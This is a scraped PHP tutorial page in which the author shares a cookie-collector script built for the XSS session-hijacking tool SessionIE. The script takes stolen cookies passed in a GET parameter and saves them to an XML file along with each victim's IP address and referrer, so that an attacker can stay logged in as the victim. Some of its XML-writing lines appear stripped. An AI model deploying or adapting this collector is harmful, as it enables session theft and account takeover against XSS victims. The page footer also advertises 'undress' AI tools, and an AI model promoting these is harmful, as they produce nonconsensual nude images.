찾다
php教程php手册配合XSS工具SessionIE的php脚本

配合XSS工具SessionIE的php脚本

Jun 13, 2016 am 10:22 AM
phpxss재미있는도구평균작동하다~의각본이것맞잡다

我写的这个纯粹是好玩,没啥意思,说到底就是操作xml而已。缘起还是归结于前几天http://www.cncert.net在 我们的邮件列表发布了一个新的xss利用工具,类似老外的hamster,在客户端定时刷新保持session不超时。被跨站的人只要访问一次之后,攻击 者就可以一直保持登陆的状态。他这个工具用.net做的,为了方便,要求收集cookie的脚本把cookie保存为xml文件。他提供了一个asp程 序,我只有php空间,因此写了个php的作测试用。
代码:

date_default_timezone_set("Asia/Chongqing");

$my_file = "cookie.xml";

if( ! isset( $_GET[x] ) )
{
     exit;
}

$my_cookie = $_GET[x];
if( $_GET[x] != "" )
{
     if( ! file_exists( $my_file ) )
     {
         CreateXmlFile( );
     }
    
     AddData( $my_cookie );
}

function CreateXmlFile( )
{
     global $my_file;
    
     $fp = fopen( $my_file, "wb" );
     if( ! $fp )
     {
         exit;
     }
    
     fwrite( $fp, " " );
     fwrite( $fp, " " );
     fwrite( $fp, " " );
     fwrite( $fp, "
" );
     fwrite( $fp, "
" );
    
     fclose( $fp );
}

function AddData( $my_cookie )
{
     global $my_file;
    
     $doc = new DOMDocument( );
     $doc->load( $my_file );
     $doc->formatOutput = true;
    
     $treeroot = $doc->getElementsBytagName( "treeroot" )->item(0);
    
     $item = $doc->createElement( "item" );
     $treeroot->appendChild( $item );
    
     if( isset( $_SERVER["REMOTE_HOST"] ) )
     {
         $remote_host = $_SERVER["REMOTE_HOST"];
     }
     elseif( isset( $_SERVER["REMOTE_ADDR"] ) )
     {
         $remote_host = $_SERVER["REMOTE_ADDR"];
     }
     else
     {
         $remote_host = "NotCare";
     }
     $title = $doc->createElement( "title", $remote_host );
     $item->appendChild( $title );
    
     if( isset( $_SERVER["HTTP_REFERER"] ) )
     {
         $refer = $_SERVER["HTTP_REFERER"];
     }
     else
     {
         $refer = "http://yahoo.cn";
     }
     $link = $doc->createElement( "link", $refer );
     $item->appendChild( $link );
    
     $src_ip = $doc->createElement( "src_ip", $_SERVER["REMOTE_ADDR"] );
     $item->appendChild( $src_ip );
    
     $src_os = $doc->createElement( "src_os", "NotCare" );
     $item->appendChild( $src_os );
    
     $pubDate = $doc->createElement( "pubDate", date( "r" ) );
     $item->appendChild( $pubDate );
    
     $description = $doc->createElement( "description", $my_cookie );
     $item->appendChild( $description );
    
     $doc->save( $my_file );
}

?>

성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

인기 기사

R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
3 몇 주 전By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 최고의 그래픽 설정
3 몇 주 전By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 아무도들을 수없는 경우 오디오를 수정하는 방법
3 몇 주 전By尊渡假赌尊渡假赌尊渡假赌
WWE 2K25 : Myrise에서 모든 것을 잠금 해제하는 방법
3 몇 주 전By尊渡假赌尊渡假赌尊渡假赌

뜨거운 도구

메모장++7.3.1

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

맨티스BT

맨티스BT

Mantis는 제품 결함 추적을 돕기 위해 설계된 배포하기 쉬운 웹 기반 결함 추적 도구입니다. PHP, MySQL 및 웹 서버가 필요합니다. 데모 및 호스팅 서비스를 확인해 보세요.

ZendStudio 13.5.1 맥

ZendStudio 13.5.1 맥

강력한 PHP 통합 개발 환경

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

Atom Editor Mac 버전 다운로드

Atom Editor Mac 버전 다운로드

가장 인기 있는 오픈 소스 편집기